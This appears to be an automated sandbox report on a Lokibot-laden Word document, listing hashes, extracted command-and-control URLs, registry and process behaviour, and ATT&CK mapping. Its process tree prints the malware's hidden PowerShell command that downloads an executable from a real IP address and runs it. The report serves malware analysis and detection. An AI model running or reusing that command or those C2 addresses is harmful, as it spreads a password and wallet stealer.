lokibot | f6e0f11f26c59925ad1bd23c4dc586de71af0863d7273ad41a17efd92384167c

General

Target

PL_017542000.doc
Size

467KB
MD5

f4e2b625051dd9283bbec085e56d0ab1
SHA1

118cae287ef1505bf04f75d5811c340ea01fa949
SHA256

f6e0f11f26c59925ad1bd23c4dc586de71af0863d7273ad41a17efd92384167c
SHA512

05b3d3e1181265359cd1264f3d9b07f5d04da696791877c98f5a9a437aba4e00b35e231c76b3f7a948fd5bf1794ca1d807a04b44a523ca378971986056b98c2b

Score

10^/10

lokibot spyware stealer trojan

Malware Config

Extracted

Family

lokibot

C2

http://209.141.50.70/D3/13/pin.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 892 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

singview.exesingview.exe

pid process

900 singview.exe
1008 singview.exe
Loads dropped DLL 4 IoCs

Processes:

powershell.exesingview.exe

pid process

892 powershell.exe
892 powershell.exe
892 powershell.exe
900 singview.exe

flow	pid	process
5	892	powershell.exe

pid	process
900	singview.exe
1008	singview.exe

pid	process
892	powershell.exe
892	powershell.exe
892	powershell.exe
900	singview.exe

Drops file in System32 directory 5 IoCs

Processes:

OUTLOOK.EXEpowershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\PerfStringBackup.TMP	OUTLOOK.EXE
File opened for modification	C:\Windows\SysWOW64\PerfStringBackup.INI	OUTLOOK.EXE
File created	C:\Windows\system32\perfc009.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh009.dat	OUTLOOK.EXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

singview.exe

description pid process target process

PID 900 set thread context of 1008 900 singview.exe singview.exe

description	pid	process	target process
PID 900 set thread context of 1008	900	singview.exe	singview.exe

Drops file in Windows directory 4 IoCs

Processes:

OUTLOOK.EXEWINWORD.EXE

description	ioc	process
File created	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File opened for modification	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File created	C:\Windows\inf\Outlook\0009\outlperf.ini	OUTLOOK.EXE
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

OUTLOOK.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672EE-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063042-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D1-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D8-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063105-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063020-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F0-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063087-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E7-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CC-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C2-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063093-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672D9-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063048-0000-0000-C000-000000000046}\ = "AddressLists"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A1-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EA-0000-0000-C000-000000000046}\ = "_CalendarModule"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EC-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006305A-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302D-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FE-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E1-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672EC-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C3-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063047-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FC-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300D-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063099-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063101-0000-0000-C000-000000000046}\ = "_Conversation"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630B0-0000-0000-C000-000000000046}\ = "_Reminder"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063093-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063104-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F9-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067352-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067356-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303E-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300E-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672D9-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E1-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063045-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302C-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F0-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672FA-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CA-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C6-0000-0000-C000-000000000046}\ = "_Stores"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307A-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672EE-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672FA-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303C-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063040-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D6-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D9-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D2-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307D-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A5-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672EE-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DA-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FB-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063033-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006308C-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063072-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F2-0000-0000-C000-000000000046}\ = "_NavigationFolder"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DC-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CE-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006305C-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

980 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exesingview.exe

pid process

892 powershell.exe
900 singview.exe
900 singview.exe

pid	process
980	WINWORD.EXE

pid	process
892	powershell.exe
900	singview.exe
900	singview.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exeOUTLOOK.EXEsingview.exesingview.exe

description	pid	process
Token: SeDebugPrivilege	892	powershell.exe
Token: SeShutdownPrivilege	1800	OUTLOOK.EXE
Token: SeDebugPrivilege	900	singview.exe
Token: SeDebugPrivilege	1008	singview.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

OUTLOOK.EXE

pid process

1800 OUTLOOK.EXE
1800 OUTLOOK.EXE
1800 OUTLOOK.EXE
1800 OUTLOOK.EXE
1800 OUTLOOK.EXE
1800 OUTLOOK.EXE
Suspicious use of SendNotifyMessage 5 IoCs

Processes:

OUTLOOK.EXE

pid process

1800 OUTLOOK.EXE
1800 OUTLOOK.EXE
1800 OUTLOOK.EXE
1800 OUTLOOK.EXE
1800 OUTLOOK.EXE
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

WINWORD.EXEOUTLOOK.EXE

pid process

980 WINWORD.EXE
980 WINWORD.EXE
1800 OUTLOOK.EXE

pid	process
1800	OUTLOOK.EXE
1800	OUTLOOK.EXE
1800	OUTLOOK.EXE
1800	OUTLOOK.EXE
1800	OUTLOOK.EXE
1800	OUTLOOK.EXE

pid	process
1800	OUTLOOK.EXE
1800	OUTLOOK.EXE
1800	OUTLOOK.EXE
1800	OUTLOOK.EXE
1800	OUTLOOK.EXE

pid	process
980	WINWORD.EXE
980	WINWORD.EXE
1800	OUTLOOK.EXE

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

OUTLOOK.EXEpowershell.exeWINWORD.EXEsingview.exe

description	pid	process	target process
PID 1800 wrote to memory of 892	1800	OUTLOOK.EXE	powershell.exe
PID 1800 wrote to memory of 892	1800	OUTLOOK.EXE	powershell.exe
PID 1800 wrote to memory of 892	1800	OUTLOOK.EXE	powershell.exe
PID 1800 wrote to memory of 892	1800	OUTLOOK.EXE	powershell.exe
PID 892 wrote to memory of 900	892	powershell.exe	singview.exe
PID 892 wrote to memory of 900	892	powershell.exe	singview.exe
PID 892 wrote to memory of 900	892	powershell.exe	singview.exe
PID 892 wrote to memory of 900	892	powershell.exe	singview.exe
PID 892 wrote to memory of 900	892	powershell.exe	singview.exe
PID 892 wrote to memory of 900	892	powershell.exe	singview.exe
PID 892 wrote to memory of 900	892	powershell.exe	singview.exe
PID 980 wrote to memory of 1640	980	WINWORD.EXE	splwow64.exe
PID 980 wrote to memory of 1640	980	WINWORD.EXE	splwow64.exe
PID 980 wrote to memory of 1640	980	WINWORD.EXE	splwow64.exe
PID 980 wrote to memory of 1640	980	WINWORD.EXE	splwow64.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe
PID 900 wrote to memory of 1008	900	singview.exe	singview.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PL_017542000.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:980

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1640

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -w Hidden Invoke-WebRequest -Uri "http://31.210.20.6/w2/PLP_017542000.exe" -OutFile "C:\Users\Public\Documents\singview.exe";C:\Users\Public\Documents\singview.exe
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:892

C:\Users\Public\Documents\singview.exe
"C:\Users\Public\Documents\singview.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:900

C:\Users\Admin\AppData\Local\Temp\singview.exe
C:\Users\Admin\AppData\Local\Temp\singview.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1008

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\singview.exe
MD5
217779bed934af71afc6c861f99ff065

SHA1
afba3658e7d5685c1e61428ada937c7b570639f7

SHA256
6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

SHA512
c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

Download Submit
C:\Users\Public\Documents\singview.exe
MD5
217779bed934af71afc6c861f99ff065

SHA1
afba3658e7d5685c1e61428ada937c7b570639f7

SHA256
6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

SHA512
c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

Download Submit
C:\Users\Public\Documents\singview.exe
MD5
217779bed934af71afc6c861f99ff065

SHA1
afba3658e7d5685c1e61428ada937c7b570639f7

SHA256
6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

SHA512
c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

Download Submit
\Users\Admin\AppData\Local\Temp\singview.exe
MD5
217779bed934af71afc6c861f99ff065

SHA1
afba3658e7d5685c1e61428ada937c7b570639f7

SHA256
6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

SHA512
c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

Download Submit
\Users\Public\Documents\singview.exe
MD5
217779bed934af71afc6c861f99ff065

SHA1
afba3658e7d5685c1e61428ada937c7b570639f7

SHA256
6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

SHA512
c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

Download Submit
\Users\Public\Documents\singview.exe
MD5
217779bed934af71afc6c861f99ff065

SHA1
afba3658e7d5685c1e61428ada937c7b570639f7

SHA256
6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

SHA512
c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

Download Submit
\Users\Public\Documents\singview.exe
MD5
217779bed934af71afc6c861f99ff065

SHA1
afba3658e7d5685c1e61428ada937c7b570639f7

SHA256
6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

SHA512
c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

Download Submit
memory/892-90-0x00000000064E0000-0x00000000064E1000-memory.dmp

Filesize
4KB

Download
memory/892-67-0x00000000023D0000-0x00000000023D1000-memory.dmp

Filesize
4KB

Download
memory/892-71-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/892-72-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/892-75-0x00000000061C0000-0x00000000061C1000-memory.dmp

Filesize
4KB

Download
memory/892-80-0x00000000062B0000-0x00000000062B1000-memory.dmp

Filesize
4KB

Download
memory/892-81-0x00000000062E0000-0x00000000062E1000-memory.dmp

Filesize
4KB

Download
memory/892-82-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/892-89-0x0000000006420000-0x0000000006421000-memory.dmp

Filesize
4KB

Download
memory/892-65-0x0000000000000000-mapping.dmp

Download
memory/892-69-0x00000000047F0000-0x00000000047F1000-memory.dmp

Filesize
4KB

Download
memory/892-66-0x0000000075FF1000-0x0000000075FF3000-memory.dmp

Filesize
8KB

Download
memory/892-68-0x0000000004830000-0x0000000004831000-memory.dmp

Filesize
4KB

Download
memory/892-70-0x00000000047F2000-0x00000000047F3000-memory.dmp

Filesize
4KB

Download
memory/900-102-0x00000000021A0000-0x000000000222A000-memory.dmp

Filesize
552KB

Download
memory/900-97-0x0000000000070000-0x0000000000071000-memory.dmp

Filesize
4KB

Download
memory/900-103-0x0000000001F00000-0x0000000001F4E000-memory.dmp

Filesize
312KB

Download
memory/900-99-0x0000000004C30000-0x0000000004C31000-memory.dmp

Filesize
4KB

Download
memory/900-93-0x0000000000000000-mapping.dmp

Download
memory/980-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/980-60-0x0000000072511000-0x0000000072514000-memory.dmp

Filesize
12KB

Download
memory/980-61-0x000000006FF91000-0x000000006FF93000-memory.dmp

Filesize
8KB

Download
memory/980-112-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1008-108-0x00000000004139DE-mapping.dmp

Download
memory/1008-107-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1008-111-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1640-101-0x000007FEFBBB1000-0x000007FEFBBB3000-memory.dmp

Filesize
8KB

Download
memory/1640-100-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads